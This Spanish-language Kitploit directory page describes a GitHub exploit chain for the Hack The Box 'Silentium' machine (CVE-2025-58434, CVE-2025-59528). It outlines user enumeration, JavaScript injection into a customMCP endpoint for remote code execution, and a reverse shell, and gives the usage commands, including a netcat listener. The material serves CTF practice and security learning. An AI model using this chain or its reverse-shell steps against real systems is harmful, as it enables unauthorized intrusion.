Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-58434-59528-htb-ctf — Explotación Silentium HTB-CTF | Kitploit
Herramientas/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

Explotación Silentium HTB-CTF

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
22hace 4 mesesAún no revisado
Compartir

CVE-2025-58434-59528-htb-ctf

Cadena de Explotación Silentium

Este repositorio contiene la cadena de explotación completa para la máquina Silentium de Hack The Box. El exploit aprovecha una vulnerabilidad en dos fases que implica enumeración de usuarios e inyección de JavaScript para lograr Ejecución Remota de Código (RCE).

📝 Descripción

La cadena de vulnerabilidades consiste en un fallo de divulgación de información y una inyección de código crítica. Al enumerar primero usuarios válidos mediante un bug de restablecimiento de contraseña, obtenemos el contexto necesario para atacar el endpoint customMCP. La RCE se logra inyectando una función JavaScript maliciosa en el parámetro mcpServerConfig, que es ejecutada por el backend de Node.js.

🛠️ Características

  • Enumeración de Usuarios: Automatiza el descubrimiento de correos electrónicos válidos del sistema usando un diccionario.
  • Inyección JavaScript: Aprovecha una IIFE (Expresión de Función Inmediatamente Invocada) para evadir la sanitización.
  • Reverse Shell TCP: Genera una shell estable usando un pipe mkfifo.
  • Automatización de Payload: Maneja todo el escape JSON y la autenticación Bearer Token automáticamente.

🚀 Requisitos

Debe tener instalados Python 3 y Bash, junto con la siguiente librería:

pip install requests

💻 Uso

1. Enumerar Usuarios

Ejecute el script de enumeración (Bash) para encontrar cuentas válidas (requiere users.txt):

python3 CVE-2025-58434.py

2. Iniciar su listener

En su máquina local, inicie un listener de Netcat:

nc -lvnp 4444

3. Ejecutar el exploit

Ejecute el script de Python proporcionando el objetivo, su IP y la clave API obtenida:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ Argumentos

ArgumentoDescripciónRequerido
-t, --targetHost objetivoSí
-k, --keyToken Bearer APISí
-l, --lhostSu IP de listener (VPN)Sí
-p, --lportSu puerto de listenerSí

⚠️ Descargo de responsabilidad

Este script está destinado únicamente a fines educativos y pruebas de penetración autorizadas en entornos CTF. Acceder o atacar objetivos sin autorización previa es ilegal.


Desafío: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528

Descargar herramienta